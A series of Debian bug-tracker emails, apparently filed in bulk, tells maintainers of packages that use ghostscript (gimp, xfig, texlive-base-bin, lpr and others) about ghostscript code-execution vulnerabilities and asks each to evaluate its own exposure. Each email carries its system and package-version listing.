http://bugs.debian.org/584055 lpr http://bugs.debian.org/584020 lsb-printing http://bugs.debian.org/584021 mediawiki-math http://bugs.debian.org/584056 mgetty-fax http://bugs.debian.org/584057 mpage http://bugs.debian.org/584058 opensched http://bugs.debian.org/584022 page-crunch http://bugs.debian.org/584023 passepartout http://bugs.debian.org/584024 pkpgcounter http://bugs.debian.org/584059 plywood http://bugs.debian.org/584025 pnm2ppa http://bugs.debian.org/584026 printconf http://bugs.debian.org/584037 prosper http://bugs.debian.org/584027 ps2eps http://bugs.debian.org/584028 pspresent http://bugs.debian.org/584029 pstoedit http://bugs.debian.org/584030 pstotext http://bugs.debian.org/584060 python-codespeak-lib http://bugs.debian.org/584031 pyxplot http://bugs.debian.org/584061 recoll http://bugs.debian.org/584032 scribus http://bugs.debian.org/584033 scribus-ng http://bugs.debian.org/584062 sdf http://bugs.debian.org/584063 tex4ht-common http://bugs.debian.org/584064 texlive-base-bin http://bugs.debian.org/584034 texmacs http://bugs.debian.org/584035 webmagick http://bugs.debian.org/584065 wv http://bugs.debian.org/584066 xapian-omega http://bugs.debian.org/584067 xfig http://bugs.debian.org/584036 xournal http://bugs.debian.org/584068 xpaint http://bugs.debian.org/584038 zope-textindexng3 Other references of interest (some been mentioned already): http://www.securityfocus.com/archive/1/511433 http://www.securityfocus.com/archive/1/511472 http://www.securityfocus.com/archive/1/511492 http://www.securityfocus.com/archive/1/511512 http://www.securityfocus.com/archive/1/511561 http://www.securityfocus.com/bid/40369 Ghostscript './Encoding/' Search Path Local Privilege Escalation Vulnerability http://bugs.ghostscript.com/show_bug.cgi?id=691339 Insecure gs initialization http://bugs.ghostscript.com/show_bug.cgi?id=691350 gs_init.ps tried in current dir despite -P- http://bugs.ghostscript.com/show_bug.cgi?id=691355 Missing -P- and -dSAFER in scripts http://bugs.ghostscript.com/show_bug.cgi?id=691356 Relative filenames in scripts Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584069: gimp: Security bugs in ghostscript
Package: gimp Version: 2.4.7-1 Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages gimp depends on: ii gimp-data 2.4.7-1Data files for GIMP ii libaa11.4p5-37+b1ascii art library ii libart-2.0-2 2.3.20-2 Library of functions for 2D graphi ii libatk1.0-0 1.22.0-1 The ATK accessibility toolkit ii libc6 2.7-18lenny2 GNU C Library: Shared libraries ii libcairo2 1.6.4-7The Cairo 2D vector graphics libra ii libdbus-1-3 1.2.1-5+lenny1 simple interprocess messaging syst ii libdbus-glib-1-2 0.76-1 simple interprocess messaging syst ii libexif12 0.6.16-2.1 library to parse EXIF files ii libfontconfig12.6.0-3generic font configuration library ii libfreetype6 2.3.7-2+lenny1 FreeType 2 font engine, shared lib ii libgimp2.02.4.7-1Libraries for the GNU Image Manipu ii libglib2.0-0 2.16.6-3 The GLib library of C routines ii libgtk2.0-0 2.12.12-1~lenny1 The GTK+ graphical user interface ii libgtkhtml2-0 2.11.1-2 HTML rendering/editing library - r ii libhal1 0.5.11-8 Hardware Abstraction Layer - share ii libjpeg62 6b-14 The Independent JPEG Group's JPEG ii liblcms1 1.17.dfsg-1+lenny2 Color management library ii libmng1 1.0.9-1Multiple-image Network Graphics li ii libpango1.0-0 1.20.5-5+lenny1Layout and rendering of internatio ii libpng12-01.2.27-2+lenny3PNG library - runtime ii libpoppler-glib3 0.8.7-3PDF rendering library (GLib-based ii librsvg2-22.22.2-2lenny1 SAX-based renderer library for SVG ii libtiff4 3.8.2-11.2 Tag Image File Format (TIFF) libra ii libwmf0.2-7 0.2.8.4-6+lenny1 Windows metafile conversion librar ii libx11-6 2:1.1.5-2 X11 client-side library ii libxext6 2:1.0.4-1 X11 miscellaneous extension librar ii libxmu6 2:1.0.4-1 X11 miscellaneous utility library ii libxpm4 1:3.5.7-1 X11 pixmap library ii zlib1g1:1.2.3.3.dfsg-12 compression library - runtime Versions of packages gimp recommends: ii gimp-gnomevfs 2.4.7-1GNOME-VFS URI plugin for GIMP ii gimp-python 2.4.7-1Python support and plugins for GIM Versions of packages gimp suggests: ii ghostscript8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF pn gimp-data-extras (no description available) pn gimp-help-en | gim (no description available) ii libasound2 1.0.16-2 ALSA library pn libgimp-perl (no description available) -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584068: xpaint: Security bugs in ghostscript
Package: xpaint Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages xpaint depends on: ii libc6 2.7-18lenny2 GNU C Library: Shared libraries ii libjpeg62 6b-14 The Independent JPEG Group's JPEG pn libpng2(no description available) pn libtiff3g (no description available) ii libxaw72:1.0.4-2 X11 Athena Widget library pn xlibs (no description available) ii zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime xpaint recommends no packages. Versions of packages xpaint suggests: pn eeyes (no description available) ii netpbm 2:10.0-12+lenny1 Graphics conversion tools -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584067: xfig: Security bugs in ghostscript
Package: xfig Version: 1:3.2.5-rel-3 Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages xfig depends on: ii libc62.7-18lenny2GNU C Library: Shared libraries ii libjpeg626b-14 The Independent JPEG Group's JPEG ii libpng12-0 1.2.27-2+lenny3 PNG library - runtime ii libx11-6 2:1.1.5-2 X11 client-side library ii libxi6 2:1.1.4-1 X11 Input extension library ii libxpm4 1:3.5.7-1 X11 pixmap library ii libxt6 1:1.0.5-3 X11 toolkit intrinsics library ii xaw3dg 1.5+E-17Xaw3d widget set Versions of packages xfig recommends: ii transfig 1:3.2.5-rel-3.1 Utilities for converting XFig figu pn xfig-libs (no description available) Versions of packages xfig suggests: pn cups-client | lpr (no description available) ii ghostscript8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF ii gimp 2.4.7-1 The GNU Image Manipulation Program ii gsfonts-x110.21 Make Ghostscript fonts available t ii netpbm 2:10.0-12+lenny1 Graphics conversion tools ii spell 1.0-20GNU Spell, a clone of Unix `spell' ii xfig-doc 1:3.2.5-rel-3 XFig on-line documentation and exa -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584066: xapian-omega: Security bugs in ghostscript
Package: xapian-omega Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584065: wv: Security bugs in ghostscript
Package: wv Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages wv depends on: ii libc6 2.7-18lenny2 GNU C Library: Shared libraries ii libexpat1 2.0.1-4+lenny3XML parsing C library - runtime li ii libfreetype6 2.3.7-2+lenny1FreeType 2 font engine, shared lib pn libglib1.2 (no description available) ii libjpeg62 6b-14 The Independent JPEG Group's JPEG pn libpng2(no description available) pn libwmf0.2-2(no description available) pn xlibs (no description available) ii zlib1g 1:1.2.3.3.dfsg-12 compression library - runtime wv recommends no packages. Versions of packages wv suggests: ii evince [postscript 2.22.2-4~lenny1 Document (postscript, pdf) viewer ii ghostscript [posts 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF ii ghostscript-x [gs] 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF ii gs 8.62.dfsg.1-3.2lenny1 Transitional package ii gv [postscript-vie 1:3.6.5-2 PostScript and PDF viewer for X ii kghostview [postsc 4:3.5.9-3+lenny3 PostScript viewer for KDE pn libwmf-bin (no description available) ii lynx 2.8.7dev9-2.1 Text-mode WWW Browser (transitiona ii tetex-bin 2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa ii tetex-extra2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584064: texlive-base-bin: Security bugs in ghostscript
Package: texlive-base-bin Version: 2007.dfsg.2-4+lenny2 Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages texlive-base-bin depends on: ii ed 0.7-3The classic unix line editor ii libc6 2.7-18lenny2 GNU C Library: Shared libraries ii libgcc1 1:4.3.2-1.1 GCC support library ii libkpathsea42007.dfsg.2-4+lenny2 TeX Live: path search library for ii libncurses5 5.7+20081213-1 shared libraries for terminal hand ii libpng12-0 1.2.27-2+lenny3 PNG library - runtime ii libpoppler3 0.8.7-3 PDF rendering library ii libstdc++6 4.3.2-1.1The GNU Standard C++ Library v3 ii libx11-62:1.1.5-2X11 client-side library ii libxaw7 2:1.0.4-2X11 Athena Widget library ii libxmu6 2:1.0.4-1X11 miscellaneous utility library ii libxpm4 1:3.5.7-1X11 pixmap library ii libxt6 1:1.0.5-3X11 toolkit intrinsics library ii mime-support3.44-1 MIME files 'mime.types' & 'mailcap ii perl5.10.0-19lenny2 Larry Wall's Practical Extraction ii tex-common 1.11.3 common infrastructure for building ii texlive-common 2007.dfsg.2-1~lenny2 TeX Live: Base component ii zlib1g 1:1.2.3.3.dfsg-12compression library - runtime Versions of packages texlive-base-bin recommends: ii texlive-base-bin-do 2007.dfsg.2-4+lenny2 TeX Live: Documentation files for Versions of packages texlive-base-bin suggests: ii evince [postscript 2.22.2-4~lenny1 Document (postscript, pdf) viewer ii ghostscript [posts 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF ii gv [postscript-vie 1:3.6.5-2 PostScript and PDF viewer for X ii kghostview [postsc 4:3.5.9-3+lenny3 PostScript viewer for KDE ii kpdf [pdf-viewer] 4:3.5.9-3+lenny3 PDF viewer for KDE ii perl-tk1:804.028-1+b1Perl module providing the Tk graph ii xpdf-reader [pdf-v 3.02-1.4+lenny2 Portable Document Format (PDF) sui ii xpdf-utils [pdf-vi 3.02-1.4+lenny2 Portable Document Format (PDF) sui Versions of packages tex-common depends on: ii debconf 1.5.24 Debian configuration management sy ii ucf 3.0016 Update Configuration File: preserv Versions of packages texlive-base-bin is related to: ii tetex-base 2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa ii tetex-bin 2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa ii tetex-extra 2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa ii tex-common 1.11.3 common infrastructure for building -- debconf information excluded -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584063: tex4ht-common: Security bugs in ghostscript
Package: tex4ht-common Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584062: sdf: Security bugs in ghostscript
Package: sdf Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages sdf depends on: ii perl 5.10.0-19lenny2 Larry Wall's Practical Extraction sdf recommends no packages. Versions of packages sdf suggests: ii ghostscript-x [gs] 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF ii gs 8.62.dfsg.1-3.2lenny1 Transitional package pn htmldoc(no description available) ii perl-doc 5.10.0-19lenny2 Perl documentation pn sdf-doc(no description available) pn sgmltools-lite (no description available) ii tetex-bin 2007.dfsg.2-1~lenny2 TeX Live: teTeX transitional packa -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584061: recoll: Security bugs in ghostscript
Package: recoll Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584060: python-codespeak-lib: Security bugs in ghostscript
Package: python-codespeak-lib Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584059: plywood: Security bugs in ghostscript
Package: plywood Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584058: opensched: Security bugs in ghostscript
Package: opensched Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584057: mpage: Security bugs in ghostscript
Package: mpage Version: 2.5.4-2 Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages mpage depends on: ii libc6 2.7-18lenny2 GNU C Library: Shared libraries ii libpaper1 1.1.23+nmu1 library for handling paper charact mpage recommends no packages. Versions of packages mpage suggests: ii ghostscript-x [gs] 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF ii gs 8.62.dfsg.1-3.2lenny1 Transitional package -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584056: mgetty-fax: Security bugs in ghostscript
Package: mgetty-fax Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages mgetty-fax depends on: ii cron 3.0pl1-105 management of regular background p ii libc62.7-18lenny2GNU C Library: Shared libraries pn mgetty (no description available) ii perl [perl5] 5.10.0-19lenny2 Larry Wall's Practical Extraction Versions of packages mgetty-fax recommends: ii metamail 2.7-54 implementation of MIME Versions of packages mgetty-fax suggests: ii debianutils2.30 Miscellaneous utilities specific t ii ghostscript-x [gs- 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF ii gs 8.62.dfsg.1-3.2lenny1 Transitional package ii gs-aladdin 8.62.dfsg.1-3.2lenny1 Transitional package pn mgetty-viewfax (no description available) ii netpbm [pnmtopng] 2:10.0-12+lenny1 Graphics conversion tools -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Bug#584055: lpr: Security bugs in ghostscript
Package: lpr Severity: grave Tags: security Justification: user security hole Please note remote execute-any-code security bugs in ghostscript: http://bugs.debian.org/583183 This package suggests ghostscript, and may be affected. Please evaluate the security of this package, and fix if needed. Thanks, Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia -- System Information: Debian Release: 5.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-pk03.17-svr (SMP w/8 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/bash Versions of packages lpr depends on: ii libc6 2.7-18lenny2 GNU C Library: Shared libraries ii netbase 4.34 Basic TCP/IP networking system lpr recommends no packages. Versions of packages lpr suggests: ii ghostscript-x [gs] 8.62.dfsg.1-3.2lenny1 The GPL Ghostscript PostScript/PDF ii gs 8.62.dfsg.1-3.2lenny1 Transitional package pn magicfilter | apsf (no description available) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
